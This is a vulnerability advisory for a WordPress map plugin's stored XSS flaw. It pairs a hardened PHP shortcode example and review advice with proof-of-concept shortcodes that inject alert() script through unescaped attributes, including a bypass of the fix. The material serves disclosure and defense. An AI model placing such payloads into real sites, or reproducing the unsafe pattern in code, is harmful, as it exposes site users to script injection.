WordPress Plugin Vulnerabilities

Leaflet Map < 3.0.0 - Contributor+ Stored XSS

Description

The plugin does not escape some shortcode attributes before they are used in JavaScript code or HTML, which could allow users with a role as low as Contributor to exploit stored XSS issues.
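The root cause described above is a shortcode handler that concatenates attribute values straight into inline JavaScript and HTML. The following is an added example, not code from the Leaflet Map plugin, contrasting that unsafe pattern with a hardened handler; the shortcode name `example-map` and both function names are hypothetical. The hardened version coerces numeric attributes, whitelists the CSS length, and passes data to the page through `wp_json_encode()` and `esc_attr()` rather than string concatenation.

```php
<?php
// Added example (not the Leaflet Map plugin's own code). Function and
// shortcode names are hypothetical.

// Unsafe pattern: shortcode attribute values are interpolated directly into
// inline JavaScript and an HTML style attribute. Because Contributors can
// author shortcodes, every one of these attributes is attacker-controlled
// text that ends up in script or markup context without escaping.
function example_map_shortcode_unsafe( $atts ) {
    $atts = shortcode_atts(
        array( 'lat' => '37.4871', 'lng' => '126.6794', 'height' => '250px' ),
        $atts,
        'example-map'
    );
    $html  = '<div class="example-map" style="height:' . $atts['height'] . '"></div>';
    $html .= '<script>var center = [' . $atts['lat'] . ', ' . $atts['lng'] . '];</script>';
    return $html;
}

// Hardened pattern: never build JavaScript from strings. Coerce numbers with
// floatval(), accept only a plain CSS length for height, serialize the
// remaining configuration with wp_json_encode(), and emit it in a data
// attribute escaped with esc_attr(). Front-end script reads it back with
// JSON.parse(el.dataset.config) and never evaluates attribute text as code.
function example_map_shortcode_safe( $atts ) {
    $atts = shortcode_atts(
        array( 'lat' => '37.4871', 'lng' => '126.6794', 'height' => '250px' ),
        $atts,
        'example-map'
    );

    // Numeric coercion: non-numeric input collapses to 0.0, so script text
    // such as "alert(1)||37.4" cannot survive into the output.
    $lat = floatval( $atts['lat'] );
    $lng = floatval( $atts['lng'] );

    // Whitelist: digits followed by a known unit, otherwise fall back to the
    // default. This blocks the style-attribute breakout seen with quoted
    // height values.
    $height = preg_match( '/^\d+(px|%|em|vh)$/', $atts['height'] )
        ? $atts['height']
        : '250px';

    // Structured hand-off to JavaScript. wp_json_encode() produces valid JSON
    // and esc_attr() makes it safe inside a double-quoted HTML attribute.
    $config = wp_json_encode( array( 'center' => array( $lat, $lng ) ) );

    return sprintf(
        '<div class="example-map" style="height:%s" data-config="%s"></div>',
        esc_attr( $height ),
        esc_attr( $config )
    );
}

add_shortcode( 'example-map', 'example_map_shortcode_safe' );
```

When reviewing a plugin for this class of bug, look for every `$atts[...]` that reaches `echo`, `printf` or string concatenation inside a `<script>` block or an HTML attribute; each one needs either type coercion (`floatval`, `intval`, a boolean or enum check) or a context-appropriate escaping function, and anything destined for JavaScript should travel as JSON in a data attribute or via `wp_localize_script()`.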

Proof of Concept

Most of the shortcode attributes are not escaped; the following is just one example:

[leaflet-map lat="alert('lat')||37.4871" lng="alert('lng')||126.6794" tileurl="'+alert('tileurl');baseUrl='https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" detect_retina="alert('detect_retina')" min_zoom="alert('min_zoom')||1" max_zoom="alert('max_zoom')||200" zoomControl="alert('zoomcontrol')" scrollWheel="alert('scrollWheel')||true" doubleClickZoom="alert('doubleClickZoom')" zoom="alert('zoom')||10" height='100px;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(String.fromCharCode(104,101,105,103,104,116))" data-x="']

Or,

[leaflet-circle fitbounds="0;});alert('fitbounds');(!function(){void 1" lat="0;});alert('lat');(!function(){void 1" lng="0;});alert('lng');(!function(){void 1" shape='});alert("shape")//' message='a']

After review of the updated changes (https://github.com/bozdoz/wp-plugin-leaflet-map/pull/138/files):

[leaflet-circle shape='});alert("shape")//' message='a']

Affects Plugins

Fixed in 3.0.0

Classification

Type
XSS
Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes

Timeline

Publicly Published
2021-07-01
Added
2021-07-01
Last Updated
2022-01-17